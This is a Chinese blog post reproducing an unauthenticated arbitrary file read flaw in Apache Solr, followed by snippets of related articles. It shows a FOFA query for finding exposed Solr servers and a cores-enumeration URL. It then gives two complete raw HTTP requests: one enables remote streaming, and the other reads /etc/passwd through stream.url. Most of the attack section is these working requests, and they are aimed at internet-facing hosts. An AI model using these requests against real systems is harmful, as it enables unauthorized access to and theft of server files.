Apache Solr 任意文件读取漏洞复现

最新推荐文章于 2024-06-25 11:16:27 发布
最新推荐文章于 2024-06-25 11:16:27 发布
阅读量337 收藏 1
点赞数
分类专栏: 0day 渗透测试 漏洞 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aixioxiaoxaio/article/details/116459333
版权
渗透测试 同时被 3 个专栏收录
5 篇文章 1 订阅
订阅专栏
漏洞
3 篇文章 0 订阅
订阅专栏
0day
1 篇文章 0 订阅
订阅专栏

Apache Solr 任意文件读取漏洞复现

前段时间hvv的时候,发现的oday漏洞,本着学习的精神,于是我想复现了一波。Apache Solr 存在的这个任意文件读取的漏洞,攻击者可以在未授权的情况下获取到目标系统的敏感文件。

漏洞复现开始

首先我们用fofa搜索

app="APACHE-Solr"

在这里插入图片描述

然后打开首页:

在这里插入图片描述

再然后需要获取到cores的配置信息,怎么获取呢?

http://xxx/solr/admin/cores?indexInfo=false&wt=json

在这里插入图片描述

这里的name就是core_name.

再然后,通过抓包工具,向服务器发送POST请求:

POST /solr/vergabe/config HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://4c4849ce-b8f1-4d41-b9b9-5fe6c19761d1
Content-Length: 84
Connection: close

{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

在这里插入图片描述

如果返回包中出现“This response format is experimental. It is likely to change in the future.”,那么说明,这个任意文件读取的漏洞存在。接下来就该构造文件读取的请求包了。

构造一下请求读取的文件:

POST /solr/vergabe/debug/dump?param=ContentStreams HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

stream.url=file:///etc/passwd

在这里插入图片描述

这个Apache Solr 任意文件读取漏洞的复现就算是完成了。

后土轮回台
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Solr漏洞总结(比较全面的哦)
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权
Apache Solr 任意文件读取漏洞
dahege666的博客
05-10 2113
环境搭建 下载后解压,然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd,访问 http://ip:8093(默认) Apache Solr简介 Apache Solr是一个开源的索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提
漏洞复现】通天星CMSV6——pointManage——SQL注入
最新发布
LongL_GuYu的博客
06-25 623
通天星CMSV6小于7.33.0.7版本存在接口pointManage存在注入漏洞,攻击者可写入恶意文件从而获取系统控制权。
Apache Solr任意文件读取漏洞复现
deng_menglihua的博客
03-19 2614
Apache Solr 任意文件读取漏洞 一.漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 二.影响版本 Apache Solr <= 8.8.1 三.漏洞复现 1.搭环境 下载Solr https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz 也使用fofa大法,索 app=“Solr” 访问目标 2.获取core的信息 访问
漏洞复现Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7365
漏洞复现Apache系列(二)之Solr漏洞复现
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1619
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
这个“Apache-Solr-EXP”项目关注的是一个特定的安全漏洞,即Apache Solr任意文件读取漏洞。该漏洞允许攻击者通过精心构造的请求访问服务器上的任意文件,这可能对系统的安全性构成严重威胁。 在Python 3.8或更高...
Apache Solr最新版任意文件读取0day1
08-03
Apache Solr 是一个流行的开源全文索引擎,...总之,Apache Solr任意文件读取漏洞是值得注意的安全问题,尤其是在默认配置下运行的系统。为了系统的安全性,管理员应该实施严格的访问控制策略,并保持软件的更新。
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
Apache Solrsolr-7.7.3.tgz)
02-05
7. **LICENSE** 和 **NOTICE**: 这些文件提供了关于Apache Solr的许可和版权信息。 在部署和使用Solr时,你需要知道如何配置Solr核心(core)以满足你的需求,这可能涉及到创建和修改`solrconfig.xml`(配置文件)...
Apache-Solr 任意文件读取漏洞复现
不想当脚本小子的脚本小子
03-20 668
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
weixin_44047654的博客
02-22 221
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
千寻的博客
03-23 1224
Config API默认是开启的,使得攻击者可以从远程位置上传配置文件Solr 服务器上。 * 一个制定的请求可以控制 Solr 服务器上的` Core 配置`文件,其中包括对 Solr Core 的`安全性`和`资源限制`的许多设置。 * 由于缺乏`身份验证和授权机制`,攻击者可以`配置设置`,执行任意命令,命令是在具有系统权限的 Solr 服务器上执行的.
Apache Solr 任意文件读取复现
时光凉春衫薄的博客
04-09 239
Apache Solr 然后访问这个目录就可以拿到当前db的名字 http://[ip]/solr/admin/cores?indexInfo=false&wt=json 然后把得到的名字在这个url中替换掉就可以任意读取文件 http://[IP]/solr/[name]/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd ...
漏洞复现----5、Apache Solr远程命令执行漏洞(CVE-2019-0193)
七天
11-25 1298
文章目录一、Apache Solr 简介二、漏洞简介三、漏洞利用 一、Apache Solr 简介 Solr是基于Lucene的面向企业索的web应用,是一个独立的企业级索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、漏洞简介 此次漏洞出现在 Apache Solr 的 DataI
Apache Solr最新任意文件读取漏洞
蚁景网安学院
04-01 932
漏洞简介 Apache Solr是一个开源索服务引擎,默认安装未授权情况下攻击者可以构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 本文涉及相关实验:CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞Apache Solr是一个开源的索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。) 影响版本 solr任意版本 环境搭建 漏洞环境下载: https://archive.apache.org/d
Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
qq_34853514的博客
08-23 569
漏洞简介 漏洞编号: CVE-2019-0193 漏洞详情: Solr是一个高性能,采用Java5开发,基于Lucene的全文索服务器。漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 漏洞影响范围: Apache Solr < 8.2.0 漏洞
FOFA常用索语法
热门推荐
u010508029的博客
05-18 1万+
CVE-2019-17558Apache Solr Velocity模板远程代码执行 app="Apache-Shiro"
"Apache Solr 组件安全概览:历史漏洞分析与防御建议
最后,本文提出了一个全版本任意文件读取漏洞的案例,该漏洞已被作者发现并报告给Apache Solr官方,但官方拒绝修复该漏洞。因此,本文呼吁用户谨慎处理这一漏洞,建议采取相应的安全措施和风险管理措施,以确保系统...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值